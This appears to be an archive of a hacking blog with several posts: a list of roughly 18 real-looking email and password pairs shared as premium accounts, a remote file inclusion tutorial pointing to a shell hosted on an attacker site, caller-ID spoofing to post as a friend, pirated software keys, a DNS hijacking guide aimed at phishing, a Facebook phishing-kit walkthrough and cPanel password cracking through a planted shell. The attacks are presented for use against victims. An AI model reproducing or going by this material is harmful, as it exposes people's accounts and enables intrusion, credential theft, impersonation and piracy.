Category Archives: NEW TRICK

Premium Wupload 3/4/2012

esteban_benavides@yahoo.com – e9MDxhT3k
Pccatcher@gmx.ch – 9grTmiMQk
sbcaront@gmail.com – ej283350.-
samymoustafa@upcmail.nl – ihsane
jjbcsr@yahoo.com – railroad
Dazza.lfc@gmail.com – dazza417
qwdrert@web.de – 3382169
yavuzzayim@hotmail.com – 19801980
dorseysr@gmail.com – 123faith
mouse128@singnet.com.sg – mickyang
teslerd@gmail.com – loverman
hot88stang@yahoo.com – stangg
joachim-uwe.lang@t-online.de – jlang1
skyriders99@hotmail.com – putaria
presentsdupasse@numericable.fr – valere
steph2k1uk@hotmail.co.uk – 12345678
shun@fujiwara-ah.com – sujiskk
perry.cain@gmail.com – neoteric

Best PPC Advertising Networks | Pay Per Click

Best PPC Advertising Networks | Pay Per Click
Google AdSense is the most popular option under this category, but there are also others. Basically you need to sign up with the network and paste some code snippets on your website. The network will then serve contextual ads (either text or images) relevant to your website, and you will earn a certain amount of money for every click.
The profitability of PPC advertising depends on the general traffic levels of the website and, most importantly, on the click-through rate (CTR) and cost per click (CPC). The CTR depends on the design of the website. Ads placed abode the fold or blended with content, for instance, tend to get higher CTRs. The CPC, on the other hand, depends on the nice of the website. Mortgages, financial products and college education are examples of profitable niches (clicks worth a couple of dollars are not rare), while tech-related topics tend to receive a smaller CPC (sometimes as low as a couple of cents per click).
The source of the traffic can also affect the overall CTR rate. Organic traffic (the one that comes from search engines) tends to perform well because these visitors were already looking for something, and they tend to click on ads more often. Social media traffic, on the other hand, presents terribly low CTRs because these visitors are tech-savvy and they just ignore ads.
List of popular CPC advertising networks:

Tutorial On Port Scanning (Hacking Technique)

In my last post, I explained about Information Gathering technique and this tutorial is based on port scanning,.

So what is port scanning? In simple words, port scanning is the way to scanning computer ports for finding open servicesassociated with that particular computer. Each service in our computer has identified by a well known virtual port. Every service on a host is identified by a unique 16-bit number called a port. Port scanning, a hacking technique  helps the attacker in finding the available ports. Port scanning consists of sending a message to each port, one at a time. The kind of response received indicates whether the port is used and can therefore be probed further for weakness. This is often used by hackers to identify running services on a host with the view to compromising it.
The port numbers are divided into three major categories:
  • Well Known Ports (0 – 1023)
  • Registered Ports (1024 – 49151)
  • Dynamic and/or Private Ports (49152 – 65535)
Default ports & their services
Port Service
21 FTP
23 Telnet
25 SMTP
80 HTTP
110 POP3
8080 Proxy
Check whether your computer is infected or not:
  • Go to command prompt> Type netstat -n
  • It will display all the active connections with ports (for e.g. in foreign address 74.125.236.24:80, 80 is the port number)
  • Now type “tasklist” in command prompt, it will display all the processes with their process IDs (labelled PID).
  • If you find any suspicious running process, then type “netstat -no” in command prompt and check the connection associated with that PID.
  • At end, terminate the process using command “taskkill /PID 1786” where 1786 is the PID.

How To Hack Website By Remote File Inclusion

A Remote File Inclusion vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.

Normally, I’m against stuff like this. I believe people should find their own vulnerable sites. But, for the sake of this paper, i will show you how we can use google to get us
vulnerable sites.

We will query google like so:
Code:
inurl:”index.php?page=”

This query asks google to give us any page with index.php?page= in the url. If we look at it, we can see that ‘page’ is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter
http://www.google.com after the equal sign.

Code:
http://www.site.com/index.php?page=www.google.com

If the full google.com website appears on the page, the websiteis vulnerable. If not, keep
looking.

To exploit the vulnerability we must first look at the following example of a RFI:Code:

http://www.shittysite.com/index.php?page=www.evilsite.com/shell.txt?

A) Get a free host website (like dajoob or free webs)
B) Put a PHP shell (c99) in text form on the site
C) Insert the path to the shell in the vulnerable hosts url,
like the example above.
D) You can then proceed to deface the site etc.

download shell here :
Code:
http://0nzz.t35.com/c99ud.txt

How to Send free anonymous SMS from any number to any number

To send anonymous SMS , first you need to sign up on smsglobal.com. On registration, you will 25 free credit that can be used to send 25 SMS free of cost from one number to another in India or anywhere in the world.To send your first free anonymous message follow the below steps:

1.Visit this link and register on SmSglobal.com
2.After registration , password will be sent to your mobile,
   enter the password and login into your online account.
3.Now click on “Send SMS to number ” tab in right side of
   your account.
4.Just enter the Sender ID, where you can write any number
   rather than your own mobile number. Don’t forget to add
  ‘91’ before the number into both text field.
5. This is really a great website to play pranks with your
   friends but can be very dangerous sometimes as you can do
   much more than just sending anonymous SMS with this
   trick , for example you can update wall post of any of your
   friends using this trick . How? Let me tell you.

 

Now a days everybody is using Facebook Mobile text service to update their wall status.If you have tried this service then you must be knowing that to update your Facebook status you need to send your wall text to ‘9232232665″.Now with SMSGloblal , you just need to send a text message to Facebook number(‘9232232665) from your friend’s mobile number and which you can easily do using your SMS global account.
NOTE: It is a great trick but misusing this service can cause serious trouble to both you and your friend ,so I request you to please avoid misuse of this service

Crack IDM Manually (Specially For Windows 7 Users)

Mostly time after updating your IDM, it shows error you have registered IDM using fake serial key”. In my old post, I posted to download IDM without any keygen, but it shows error while installing it in Windows 7 something like “Windows cannot find ‘crys18.exe’ make sure that u typed the name correctly”. Later I search on net how to crack IDM, then finally I found a solution. If you are windows 7 users, then this post is for you, because for XP/Vista users , users can easily access full version IDM by downloading it from here without any keygen & error, follow these steps:
  • Download the IDM, then click on Registration.
  • A dialog box will appear asking for Name, Last Name, Email Address and Serial Key.
  • Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:

    RLDGN-OV9WU-5W589-6VZH1
    HUDWE-UO689-6D27B-YM28M
    UK3DV-E0MNW-MLQYX-GENA1
    398ND-QNAGY-CMMZU-ZPI39
    GZLJY-X50S3-0S20D-NFRF9
    W3J5U-8U66N-D0B9M-54SLM
    EC0Q6-QN7UH-5S3JB-YZMEK
    UVQW0-X54FE-QW35Q-SNZF5
    FJJTJ-J0FLF-QCVBK-A287M

  • After clicking, it will show error message that you have registered IDM using fake serial key and IDM will exit.
  • Now Go to the path C:\WINDOWS\system32\drivers\etc\hosts
  • Open hosts file with notepad.
  • Now copy the below lines of code and paste it to below 127.0.0.1 localhost
    127.0.0.1    tonec.com
    127.0.0.1    http://www.tonec.com
    127.0.0.1    registeridm.com
    127.0.0.1    http://www.registeridm.com
    127.0.0.1    secure.registeridm.com
    127.0.0.1    internetdownloadmanager.com
    127.0.0.1    http://www.internetdownloadmanager.com
    127.0.0.1    secure.internetdownloadmanager.com
    127.0.0.1    mirror.internetdownloadmanager.com
    127.0.0.1    mirror2.internetdownloadmanager.com
  • Save it.
  • Now check IDM, it should be converted to full version.
Note: In Windows 7 sometimes it denied access to write anything on hosts file, so first you must be logged in as Administrator and then change the file permissions of hosts file.

DNS Hacking/Hijacking Tutorial

       43477664rk1.gif (177×77)

This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.
To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.

Why DNS?

The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.

Malicious DNS Server

So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.

Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)

sudo gedit /etc/dnsmasq.conf

The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof

The format for this is address=/HOST/IP


So for example;

address=/facebook.com/63.63.63.63

where 63.63.63.63 is the IP of your malicious web server

Save the file and restart dnsmasq by running

sudo /etc/init.d/dnsmasq restart

You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63

Malicious Web Server

You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.

There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site

I’ll presume you know how to do that though

Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.

I Can Be Your DNS Server Plz?

An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that

But how do you get a victim? Well this is where my project, the IP Experiment could come in handy

If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.

Tutorial by doc

Dictionary Attack Using Brutus Over a FTP Server–Video Tutorial

Dictionary Attack Brutus Read the rest of this entry

Learn How to Hack Facebook Password

Hacking Facebook Account Password: Facebook Phishing for Hacking Facebook

Facebook has evolved into one of the hottest social networking website in the world. Here is a simple tutorial that you can use to hack your friend’s facebook password. Here i’m writting on hacking Facebbok password using Facebook Phisher.
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.[Read more about phishing on Wikipedia]

Facebook Phisher


Please Note: Phishing is legally offensive. I am not responsible for any action done by you.

Hacking Facebook password:

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.

1. First of all download Facebook Phisher

2. The downloaded file contains:

  • Index.html
  • write.php

3. Upload both files to any of these free webhost sites:
See Best Free Webhosting websites

4. Now, send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.

5. Once he logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in “passes.txt”. This file is created in your webhost control panel as shown.


If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.

6. Now, open passes.txt to get hacked Facebook id and password as shown.


Hope this tutorial was useful for you.

Don’t Forget to Leave a Comment 🙂

Cpanel Hacking/Cracking Tutorial

Today we will Learn CPANEL cracking or Hacking  i.e gaining password for port no 2082 on website first of all we need a cpanel cracking shell on the server because we are going to crack those websites cpanels which are hosted on the shelled server.

so lets start i am using cpanel.php [download it here]shell for cracking 🙂 we need two things in cracking first one is usernames of the websites that are hosted on the server second is a good password dictonery [Get Passwords List Here]

so
 in first step :-
 grab the usernames of the websites using command ls /var/mail
 or use the "Grab the usernames from /etc/passwd" option in the shell
press the go button
  we have done from our side
  lets wait and watch ,if we have supplied good passwords then shell will show a message 
   " [~]# cracking success with username "xyz" with password "xyz"   "
  otherwise it will show 
   "[~] Please put some good passwords to crack username "xyz" :( "
  so chances of success depends on password list that we are using in cracking process
[GUEST POST]
Credits To z3r0 c00l and Team Indishell